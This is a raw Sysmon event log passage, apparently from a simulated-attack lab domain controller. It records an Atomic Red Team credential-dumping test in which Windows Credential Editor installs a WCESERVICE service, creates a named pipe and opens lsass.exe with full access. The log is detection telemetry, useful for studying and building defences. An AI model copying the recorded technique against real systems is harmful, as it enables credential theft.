Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA3E24812855C2310BEA14BAFC2BAF35,SHA256=6F903955CC176A311AD186F61314D33ADD32A5B9C3C197D9A6340672986F9609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.984{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD3E80137386A453B4881A300E31243,SHA256=302BDA24DCAFEA6651AF387AD0D0A3A55C833635BEA5DB6DA7C101A0C3D5AA6B,IMPHASH=00000000000000000000000000000000falsetrue 824800x800000000000000025493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.953{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe28600x00000277FAAD082C-- 10341000x800000000000000025492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.953{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000025491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:16.273{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61537-false10.0.1.12-8000- 824800x800000000000000025490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.923{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe69560x00000277FAAD082C-- 10341000x800000000000000025489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.923{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe7120x00000277FAAD082C-- 10341000x800000000000000025487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+25cc|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:10:17.890{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exeC:\Windows\Temp\wceaux.dll2021-06-23 21:10:17.874 18141800x800000000000000025482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-ConnectPipe2021-06-23 21:10:17.874{4DB9351A-A339-60D3-5206-00000000CF01}6980\WCEServicePipeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe 17141700x800000000000000025481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:17.874{4DB9351A-A339-60D3-5306-00000000CF01}5972\WCEServicePipeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe 10341000x800000000000000025480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDB-60D3-0A00-00000000CF01}620684C:\Windows\system32\services.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}6202864C:\Windows\system32\services.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\system32\services.exe+21fc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000025473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.873{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe-----C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe -SC:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\System32\services.exeC:\Windows\system32\services.exe 13241300x800000000000000025472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ObjectNameLocalSystem 13241300x800000000000000025471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\DisplayNameWCESERVICE 13241300x800000000000000025470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localT1031,T1050SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ImagePathC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe -S 13241300x800000000000000025469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ErrorControlDWORD (0x00000000) 13241300x800000000000000025468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localT1031,T1050SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\StartDWORD (0x00000003) 13241300x800000000000000025467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\TypeDWORD (0x00000010) 10341000x800000000000000025466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-A339-60D3-5106-00000000CF01}68361012C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+159f9b(wow64)|C:\Windows\System32\KERNELBASE.dll+159c4c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe+11d1|C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe+2016|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000025459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 